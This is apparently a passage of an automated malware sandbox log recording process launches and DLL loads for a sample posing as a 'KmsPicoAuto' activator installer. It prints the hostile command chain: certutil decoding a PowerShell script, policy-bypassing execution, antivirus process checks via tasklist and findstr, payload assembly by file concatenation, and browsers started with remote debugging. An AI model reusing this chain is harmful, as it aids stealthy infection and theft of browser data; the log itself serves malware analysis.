Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -decode -f C:\Users\user~1\AppData\Local\Temp\2975.ps1 C:\Users\user~1\AppData\Local\Temp\2975.ps1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs"
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\2975.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user~1\AppData\Local\Temp\putt.exe"
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 615578
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "applied" Manually
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Saddam + ..\Intro + ..\Perfectly + ..\Robertson + ..\Warm w
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\615578\Participating.com Participating.com w
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2356,i,6525956893070275534,18255261071347159219,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D70795A19597363BCA1BA6E959046918 C	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 98F0657E4B4BD5B7A8EF6A74F6816EC8	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIC534.tmp "C:\Windows\Installer\MSIC534.tmp" /DontWait "C:\Program Files (x86)\SoftPortable\KmsPicoAuto\1.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -decode -f C:\Users\user~1\AppData\Local\Temp\2975.ps1 C:\Users\user~1\AppData\Local\Temp\2975.ps1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs"	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\2975.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user~1\AppData\Local\Temp\putt.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 615578
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "applied" Manually
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Saddam + ..\Intro + ..\Perfectly + ..\Robertson + ..\Warm w
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\615578\Participating.com Participating.com w
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2356,i,6525956893070275534,18255261071347159219,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msihnd.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Installer\MSIC534.tmp	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\Installer\MSIC534.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Installer\MSIC534.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Installer\MSIC534.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Installer\MSIC534.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Installer\MSIC534.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
